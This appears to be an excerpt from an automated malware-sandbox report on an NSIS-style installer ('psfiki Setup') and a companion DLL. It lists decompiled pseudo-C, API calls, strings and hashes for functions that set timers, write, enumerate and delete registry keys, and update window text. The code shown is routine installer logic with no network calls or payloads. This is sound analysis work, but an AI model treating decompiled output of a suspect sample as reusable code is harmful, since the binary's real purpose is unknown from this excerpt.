                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                          • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                          • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0x7431a
					_t11 =  *0x428b88; // 0x7431e
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                          0x00402b3a
                                          0x00402b48
                                          0x00402b4e
                                          0x00402b4e
                                          0x00402b5c
                                          0x00402b5e
                                          0x00402b64
                                          0x00402b6b
                                          0x00402b6d
                                          0x00402b6d
                                          0x00402b83
                                          0x00402b93
                                          0x00402ba5
                                          0x00402ba5
                                          0x00402bad

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                          • MulDiv.KERNEL32 ref: 00402B73
                                          • wsprintfA.USER32 ref: 00402B83
                                          • SetWindowTextA.USER32(?,?), ref: 00402B93
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BA5
                                          Strings
                                          • verifying installer: %d%%, xrefs: 00402B7D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                          • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                          • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                          • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100033C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
                                          • RegOpenKeyExW.ADVAPI32 ref: 10003499
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Openlstrcpyn
                                          • String ID: %s\%s\0x%08x$(%p)$LanguageProfile
                                          • API String ID: 77534328-1421907492
                                          • Opcode ID: 9b77289758df9981cdb12700273a463d6cf56a7f0995d51183b9165fc53271a7
                                          • Instruction ID: 56304973e0b4e9db6d9f05f938ea1b2b76457ad332e19d182b71333593b2a668
                                          • Opcode Fuzzy Hash: 9b77289758df9981cdb12700273a463d6cf56a7f0995d51183b9165fc53271a7
                                          • Instruction Fuzzy Hash: D9311AB5D00208EFEB04DF94C845F9DB7B9EF48300F108199E905AB356E734AE94CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001580, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 1000163F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          • Opcode ID: a3265998271b895778a66952157956997085e265a9827a5dfd37aaf3073f306b
                                          • Instruction ID: 6dbbca54aea7cc84ead60828b754bf1db3c43d15c3bab5d3bf0356fa8ccda860
                                          • Opcode Fuzzy Hash: a3265998271b895778a66952157956997085e265a9827a5dfd37aaf3073f306b
                                          • Instruction Fuzzy Hash: F53128B9900209AFEB04DFA4DC45BDE77B1EB88384F108468F9155B345D672EA90CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001190, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • (%p)->(%s %p), xrefs: 10001239
                                          • (%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
                                          • (%p)->(IID_IUnknown %p), xrefs: 100011C9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
                                          • API String ID: 2931989736-4158896418
                                          • Opcode ID: 4a77c355e408ac4a6c22c325ebe84522738fa96a0ab4edefaf98694eb5ea0f4e
                                          • Instruction ID: e121058abd95a96cada51250d5e450097ea962742a6669d7697363644343d13c
                                          • Opcode Fuzzy Hash: 4a77c355e408ac4a6c22c325ebe84522738fa96a0ab4edefaf98694eb5ea0f4e
                                          • Instruction Fuzzy Hash: 66211AF9D00209EBEB04DFA4DC41FEE73B4EB98240F108468F9159B345E631EA608B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040373D, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x2903c0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "psfiki Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x1
						_t27 =  *0x42eb88; // 0x29056c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x290584
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                          0x00403741
                                          0x00403746
                                          0x0040374c
                                          0x00403751
                                          0x00403751
                                          0x00403759
                                          0x00000000
                                          0x00000000
                                          0x0040375b
                                          0x00403761
                                          0x00403769
                                          0x0040376b
                                          0x00403771
                                          0x00403771
                                          0x00403773
                                          0x0040377f
                                          0x00000000
                                          0x00000000
                                          0x00403783
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403785
                                          0x0040378a
                                          0x00403793
                                          0x00403799
                                          0x0040379e
                                          0x004037b2
                                          0x004037bd
                                          0x004037d5
                                          0x004037db
                                          0x004037e0
                                          0x004037e8
                                          0x00403809
                                          0x00403809
                                          0x00403809
                                          0x004037ea
                                          0x004037ec
                                          0x004037ec
                                          0x004037f0
                                          0x004037f3
                                          0x004037f7
                                          0x004037f7
                                          0x004037fc
                                          0x00403802
                                          0x00403802
                                          0x00000000
                                          0x004037ec
                                          0x004037a0
                                          0x004037a5
                                          0x004037ae
                                          0x004037a7
                                          0x004037a7
                                          0x004037a7
                                          0x004037a5

                                          APIs
                                          • SetWindowTextA.USER32(00000000,psfiki Setup), ref: 004037D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$psfiki Setup$M)
                                          • API String ID: 530164218-1714131925
                                          • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                          • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                          • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                          • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}











                                          0x004022f6
                                          0x004022fb
                                          0x00402305
                                          0x0040230f
                                          0x00402312
                                          0x0040231c
                                          0x0040232c
                                          0x00402333
                                          0x0040233b
                                          0x00402349
                                          0x0040234d
                                          0x00402358
                                          0x00402358
                                          0x0040235c
                                          0x00402360
                                          0x00402366
                                          0x0040236b
                                          0x0040236b
                                          0x0040236f
                                          0x0040237b
                                          0x0040237b
                                          0x00402394
                                          0x00402396
                                          0x00402396
                                          0x00402399
                                          0x0040246f
                                          0x0040246f
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402333
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssE7A3.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssE7A3.tmp,00000000), ref: 0040238C
                                          • RegCloseKey.ADVAPI32(?), ref: 0040246F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp
                                          • API String ID: 1356686001-2374367887
                                          • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                          • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                          • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                          • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100016E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
                                          • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
                                          • RegCloseKey.ADVAPI32(?), ref: 10001787
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateFromString
                                          • String ID: %s\%s$(%p) %s
                                          • API String ID: 1280075732-2567790950
                                          • Opcode ID: ce500cfd66b65368fcf2a15793b5911913619d7a83bbbaf70042ad8ddcb55dee
                                          • Instruction ID: 3c8db2802ff1f6ab8b436818d85b303364ea296c6f62b5d311a1c991380d0d11
                                          • Opcode Fuzzy Hash: ce500cfd66b65368fcf2a15793b5911913619d7a83bbbaf70042ad8ddcb55dee
                                          • Instruction Fuzzy Hash: 40115AF59402087BF710DBA4DC46FEE777CEB48740F008559F709AA145E675E684C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100017A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
                                          • RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
                                          • RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DeleteTree$FromString
                                          • String ID: %s\%s$(%p) %s
                                          • API String ID: 1665489665-2567790950
                                          • Opcode ID: f00fbd4f5c3d1691f66a8c0d2c55779630351e28ee0c36c88d6c747852e204d9
                                          • Instruction ID: 0ce1d3881f00ccc814ef357d99d13f4ff9ef5cab1f85d9203a267f938c563a6f
                                          • Opcode Fuzzy Hash: f00fbd4f5c3d1691f66a8c0d2c55779630351e28ee0c36c88d6c747852e204d9
                                          • Instruction Fuzzy Hash: 1C01E1F6800118EFFB10DBA49C45F9A73BCEB58204F00C155B60D96105EA31EB98CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002E80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCloseKey.ADVAPI32(?), ref: 10002E9B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
                                          • HeapFree.KERNEL32(00000000), ref: 10002ED8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseHeap$FreeProcess
                                          • String ID: destroying %p
                                          • API String ID: 3033025533-3738993722
                                          • Opcode ID: aa96f5e93ebf0edfe4314f2bf4726b7c8a764b001950a5a4a073e003b2b553c4
                                          • Instruction ID: cb27d5eab1f625c8bc2e7fc68b294abe3c1c585d519fb808310b501a8b3f58d2
                                          • Opcode Fuzzy Hash: aa96f5e93ebf0edfe4314f2bf4726b7c8a764b001950a5a4a073e003b2b553c4
                                          • Instruction Fuzzy Hash: AFF079B9200208AFD701DF54C884EA977A9FB8D355F11C148FA098B365C735E981CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}










                                          0x00402a38
                                          0x00402a49
                                          0x00402a51
                                          0x00402a79
                                          0x00402a60
                                          0x00402a63
                                          0x00402ab3
                                          0x00402ab9
                                          0x00402abb
                                          0x00000000
                                          0x00402abb
                                          0x00402a70
                                          0x00402a75
                                          0x00402a77
                                          0x00000000
                                          0x00000000
                                          0x00402a77
                                          0x00402a8e
                                          0x00402a96
                                          0x00402a9d
                                          0x00402ac3
                                          0x00402ac9
                                          0x00000000
                                          0x00000000
                                          0x00402ad1
                                          0x00402ad7
                                          0x00402ad9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402ad9
                                          0x00000000
                                          0x00402aac
                                          0x00402ac0

                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                          • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                          • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                          • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                          0x00401ccb
                                          0x00401cd2
                                          0x00401d01
                                          0x00401d09
                                          0x00401d10
                                          0x00401d10
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                          • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                          • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                          • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100031D0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 1000324E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Enum
                                          • String ID: '$(%p)
                                          • API String ID: 2928410991-2641672736
                                          • Opcode ID: f1dbfbd6fa98d78f8e244c2f58914a71cb0c7876369f66b7624f4cbfca899760
                                          • Instruction ID: b6d1d7657e7a7e3edf9a50d0917a8c82399f877b3b2979ff95ef16c476ba8dd8
                                          • Opcode Fuzzy Hash: f1dbfbd6fa98d78f8e244c2f58914a71cb0c7876369f66b7624f4cbfca899760
                                          • Instruction Fuzzy Hash: E24129B4D00209EFEB05CF98C885B9EB7F5FB48354F20C569E815AB285C774AA80DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002C90, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 10002D07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Enum
                                          • String ID: '$(%p)
